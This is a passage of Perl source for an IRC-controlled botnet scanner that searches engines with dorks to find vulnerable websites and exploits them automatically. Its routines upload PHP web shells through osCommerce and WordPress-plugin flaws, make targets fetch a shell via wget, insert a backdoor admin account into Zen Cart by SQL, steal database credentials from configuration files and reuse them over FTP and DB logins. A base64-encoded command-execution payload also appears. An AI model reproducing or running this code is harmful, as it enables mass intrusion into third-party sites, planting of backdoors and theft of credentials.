&msg("$path","$jnewlogo12 Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,19); } } } if my my my my ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) { $url = $_[0]; $host = $_[1]; $user = $_[2]; $pass = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","12FTP15 Checking $host | $us er:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass) ; $ftp->quit; if ($success == 0) { &notice("$nick","12[6FTP12] [ 6http: //".$host." 12] [".$user.":".$pass."12] 9Success "); } else { &notice("$nick","12[6FTP12] [ 6http: //".$host." 12] [".$user.":".$pass."12] 4Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } }

} } ################################################################################ ## sub kulo() { my $dork = $_[0]; my @targets; for (my $st=0; $st<=1000 ; $st+=100){ my $engine = "http://www.google.com/search?q=".uri_escape($dork) ."&num=100&start=".$st; my $browser = &search_engine_query($engine); while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $target = $1; if ($target !~ /google|forum|stackoverflow|php\.net/) { my @sort = split(/\.php/,$target); push (@targets,$sort[0]); } } } return @targets; } sub cari() my my my my my my ; if { $chan = $_[0]; $dork = $_[1]; $count = 0; @kotor = &kulo($dork); @target = &clean(@kotor); $num = scalar(@target); &msg($chan,"$carilogo12 Total 4[15$num4]12 sites")

($num > 0) { foreach my $site(@target) { $count++; if ($count == $num-1) { &msg("$chan","$carilogo12Finished 15for 12$dork "); } my $test = "http://".$site.".php?src=".$thumbshell; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($test); if ($coba =~ /Unable to open image/) { &msg($chan,"$carilogo12 VulN 4-> 15 http://".$site.".php "); } } exit; } } }

} sub type() { my ($chan,$bug,$simpan,$dork,$engine,$type) = @_; if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);} elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine );} elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine)

;} elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);} elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 12){$type=&sql_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 13){$type=&civicrm_exploit($chan,$bug,$simpan,$dork,$eng ine);} elsif ($type == 14){$type=&acy_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 15){$type=&jnewsl_exploit($chan,$bug,$simpan,$dork,$engi ne);} elsif ($type == 16){$type=&jinc_exploit($chan,$bug,$simpan,$dork,$engine );} elsif ($type == 17){$type=&mai_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 18){$type=&jnews_exploit($chan,$bug,$simpan,$dork,$engin e);} elsif ($type == 19){$type=&jnew_exploit($chan,$bug,$simpan,$dork,$engine );} } ################################################################################ ## sub se_start() { my ($chan,$bug,$simpan,$dork,$engine,$type) = @_; if ($gps ==1) { if ($engine =~ /Indoae/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAE",$type); } exit; } } if ($engine =~ /Indoar/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAR",$type); } exit; } } if ($engine =~ /Indoat/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAT",$type); } exit; } } if ($engine =~ /Indoau/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBE",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBG",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el

se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBY",$type); } exit; } } if ($engine =~ /Indoca/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCA",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCK",$type); } exit; } } if ($engine =~ /Indocl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCL",$type); } exit; } } if ($engine =~ /Indocn/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCN",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCO",$type); } exit; } } if ($engine =~ /Indocom/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCoM",$type) ; } exit; } } if ($engine =~ /Indocz/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCZ",$type); } exit; } } if ($engine =~ /Indode/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoDE",$type); } exit; } } if ($engine =~ /Indodk/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoDK",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEC",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEDU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEE",$type); } exit; } } if ($engine =~ /Indoes/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoES",$type); } exit; } } if ($engine =~ /Indoeu/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoFI",$type); } exit; } } if ($engine =~ /Indofr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoFR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoGR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoGOV",$type); } exit; } } if ($engine =~ /Indohu/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el

se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHK",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHR",$type); } exit; } } if ($engine =~ /Indoid/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoID",$type); } exit; } } if ($engine =~ /Indoil/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIL",$type); } exit; } } if ($engine =~ /Indoin/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIN",$type); } exit; } } if ($engine =~ /Indoinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoInfO",$typ e); } exit; } } if ($engine =~ /Indoir/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIR",$type); } exit; } } if ($engine =~ /Indoit/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIT",$type); } exit; } } if ($engine =~ /Indojp/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoJP",$type); } exit; } } if ($engine =~ /Indokr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoKR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoLV",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMD",$type); } exit; } } if ($engine =~ /Indomx/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMX",$type); } exit; } } if ($engine =~ /Indomy/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMY",$type); } exit; } } if ($engine =~ /Indonet/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNeT",$type) ; } exit; } } if ($engine =~ /Indonl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNL",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNO",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNZ",$type); } exit; } } if ($engine =~ /Indoorg/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoOrG",$type) ; } exit; } } if ($engine =~ /Indoph/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPH",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el

se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPK",$type); } exit; } } if ($engine =~ /Indopl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPL",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPT",$type); } exit; } } if ($engine =~ /Indoro/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoRO",$type); } exit; } } if ($engine =~ /Indoru/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoRU",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTH",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTK",$type); } ex it; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTR",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTV",$type); } exit; } } if ($engine =~ /Indoua/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUA",$type); } exit; } } if ($engine =~ /Indouk/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUK",$type); } exit; } } if ($engine =~ /Indous/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUS",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoVN",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoWS",$type); } exit; } } if ($engine =~ /Indosi/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoSI",$type); } exit; } } if ($engine =~ /Indobe/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoZA",$type); } exit; } } if ($engine =~ /Indobiz/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBIZ",$type) ; } exit; } } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } } if ($gps2 ==1) { if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } ex it; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type)

; } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit ; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit ; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } ex it; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } ex it; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit ; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } } } } ###### EXPLOITING ####### sub rfg_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rfglogo6$engine 12Finished" ); } my $test = "http://garguritos.com/rfg.php?url=http://". $site; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $vpath = "wp-content/plugins/radykal-fancy-ga llery/admin/";

if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\ ">Your shell/){ my $vuln = $1; my $qr = $2; my $upl = "http://".$vuln.$vpath.$qr."wg et ".$thumbshell; my $crut = &get_content($upl); if ($crut =~ /3xploit/) { my $shell = "http://".$vuln.$vpath."xp.p hp"; my $check = &get_content($shell); if ($check =~ /vito-RawckerheaD/i){ my $safe = ""; my $os = ""; my $ uid = ""; if ($check =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check =~ m/color=red><b>&nb sp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$admin","$rfglogo6$engine12 sHeLL11 ".$shell."12 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$rfglogo6$engine12 s HeLL11 ".$shell."12 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$chan","$rfglogo6$engine12 V ulN12 http://".$vuln.$vpath.$qr."15 "); } } } } exit; } } } } sub zen_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zenlogo6$engine 12Finished" ); } my $test = "http://".$site.$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /zc_install/){ &zen_query($chan,$site,$test,$engine); } } exit; } } } }

sub zen_query() { my $chan = $_[0]; my $url = $_[1]; my $test = $_[2]; my $engine = $_[3]; my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email% 2C+admin_pass%29+VALUES+%2855%2C%27vito%27%2C%[email protected]%27%2C%27617 ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B"; my $req = HTTP::Request->new(POST => $test); $req->content_type("application/x-www-form-urlencoded"); $req->content("query_string=".$code); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(3); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /1 statements processed/i ) { &msg("$chan","$zenlogo6$engine15 VulN12 http://".$url."admin/login. php vito : wew "); &msg("$admin","$zenlogo6$engine15 VulN12 http://".$url."admin/login .php vito : wew"); } elsif ( $data =~ /Duplicate entry/i ) { &msg("$chan","$zenlogo6$engine12 SuccesS12 http://".$url."admin/log in.php vito : wew)"); &msg("$admin","$zenlogo6$engine12 SuccesS12 http://".$url."admin/lo gin.php vito : wew"); } } sub osco_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$oscologo6$engine 12Finished "); } my $cat = "http://".$site."admin/categories.php/login.ph p"; my $fm = "http://".$site."admin/file_manager.php/login.p hp"; my $bm = "http://".$site."admin/banner_manager.php/login .php"; my $shell = "http://".$site."images/log.php"; my $dumper = "http://".$site."images/logdb.php"; my $coba = &get_content($cat); my $cob2 = &get_content($fm); my $cob3 = &get_content($bm); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ i ) { my $test = $cat."?action=download&filena me=/includes/configure.php";

my $cek = &get_content($test); if ($cek =~ /http:\/\//) { &osql_xpl($test,$chan,$site,$eng ine); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post($cat."?cPath=&act ion=new_product_preview",['products_image' => ['./id.jpg' => 'log.php' => 'appli cation/octet-stream']],'Content-Type' => 'form-data'); $res->as_string; my $resa = $aplod->post($cat."?cPath=&ac tion=new_product_preview",['products_image' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12 Dumper6 $dumper ");sleep(1); } } if ($cob2 =~ /TABLE_HEADING_FILENAME/i) { my $test2 = $fm."?action=download&filena me=/includes/configure.php"; my $cek2 = &get_content($test2); if ($cek2 =~ /http:\/\//) { &osql_xpl($test2,$chan,$site,$en gine); } my $aplod2 = LWP::UserAgent->new; my $res2 = $aplod2->post($fm."?action=pr ocessuploads",['file_1' => ['./id.jpg' => 'log.php' => 'application/octet-stream ']],'Content-Type' => 'form-data'); $res2->as_string; my $resb = $aplod2->post($fm."?action=pr ocessuploads",['file_1' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-s tream']],'Content-Type' => 'form-data'); $resb->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12

Dumper6 $dumper ");sleep(1); } } if ($cob3 =~ /TABLE_HEADING_BANNERS/i) { my $test3 = $bm."?action=download&filena me=/includes/configure.php"; my $cek3 = &get_content($test3); if ($cek3 =~ /http:\/\//) { &osql_xpl($test3,$chan,$site,$en gine); } my $aplod3 = LWP::UserAgent->new; my $res3 = $aplod3->post($bm."?action=in sert",['banners_image' => ['./id.jpg' => 'log.php' => 'application/octet-stream' ]],'Content-Type' => 'form-data'); $res3->as_string; my $resc = $aplod3->post($bm."?action=in sert",['banners_image' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-st ream']],'Content-Type' => 'form-data'); $resc->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12 Dumper6 $dumper ");sleep(1); } } } exit; } } } } sub osql_xpl() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $request = HTTP::Request->new(GET=>$url); my $browser = LWP::UserAgent->new(); $browser->timeout(10); my $response = $browser->request($request); my @dbsinfo; if ($response->is_success) { my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = ""; my $res = $response->as_string; if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) { $dpath = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DIR path: 4 $dpath");

} if ($res =~ m/'DB_SERVER', '(.*)'/g) { $dbserver = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB Server: 4 $dbserver"); } if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) { $dbuser = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB username: 4 $dbuser"); } if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) { $dbpass = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB password: 4 $dbpass"); } if ($res =~ m/'DB_DATABASE', '(.*)'/g) { $dbname = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB database: 4 $dbname"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine ,$oscologo);sleep(1); if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$o scologo);sleep(1); } } } sub e107_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$e107logo6$engine 12Finished "); } my $test = "http://".$site.$bug; my $shellz = "http://".$site."/images/log.php"; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIu cGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgo JGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlm ICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwk cmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdz aGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9u X2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBv Yl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlz dHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9i X2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgk

